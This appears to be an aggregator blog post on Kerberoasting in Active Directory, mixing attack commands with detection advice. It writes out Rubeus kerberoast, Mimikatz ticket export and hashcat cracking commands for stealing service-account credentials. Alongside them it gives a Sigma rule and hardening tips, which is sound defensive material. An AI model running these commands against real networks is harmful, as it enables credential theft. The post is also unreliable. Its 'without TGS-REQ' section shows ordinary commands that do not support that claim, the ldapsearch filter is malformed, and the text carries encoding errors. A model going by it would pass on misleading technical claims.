Listen to this Post
Kerberoasting is a popular attack technique used to extract service account credentials in Active Directory environments. Traditionally, it involves requesting Ticket Granting Service (TGS) tickets and then cracking them offline. However, recent advancements allow attackers to perform Kerberoasting without explicitly sending a TGS-REQ, making detection more challenging.
Read the full article here: rastamouse.me
You Should Know:
1. Traditional Kerberoasting Steps
To understand the evolution, letβs first review the classic Kerberoasting method:
1. Request SPN Tickets:
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dc01.corp.local"
Or using Rubeus:
Rubeus.exe kerberoast /outfile:hashes.txt
2. Extract Tickets with Mimikatz:
Invoke-Mimikatz -Command '"kerberos::list /export"'
3. Crack with Hashcat:
hashcat -m 13100 hashes.txt rockyou.txt
2. Kerberoasting Without TGS-REQ
New techniques avoid direct TGS requests, instead leveraging:
- LDAP queries to fetch SPNs.
- Pre-authentication data from existing tickets.
Example using PowerShell:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Extracting hashes silently:
.\Rubeus.exe kerberoast /ldapfilter:"admincount=1" /nowrap
3. Defensive Measures
- Monitor LDAP queries for unusual SPN requests.
- Enable AES encryption for service accounts (harder to crack).
- Implement strong password policies for service accounts.
Detect with Sigma Rule:
title: Suspicious Kerberoasting Activity description: Detects multiple TGS requests in a short time logsource: product: windows service: security detection: selection: EventID: 4769 TicketEncryptionType: 0x17 condition: selection | count() > 5
What Undercode Say
Kerberoasting remains a critical threat to Active Directory security. The shift toward stealthier techniques (bypassing TGS-REQ) makes detection harder. Defenders must:
– Audit service accounts regularly.
– Use tools like BloodHound to identify attack paths.
– Deploy SIEM rules to catch abnormal LDAP/kerberos activity.
Linux/Win Commands for Analysis:
- Check Kerberos Tickets (Linux):
klist
- Force Kerberos Logging (Windows):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" -Name "LogLevel" -Value 1
- Find SPNs via LDAP (Linux):
ldapsearch -H ldap://dc01.corp.local -D "[email protected]" -W -b "dc=corp,dc=local" "(servicePrincipalName=)"
Expected Output:
A refined detection strategy combining log analysis, encryption upgrades, and least-privilege principles is essential to mitigate modern Kerberoasting attacks.
Reference: rastamouse.me
References:
Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass β
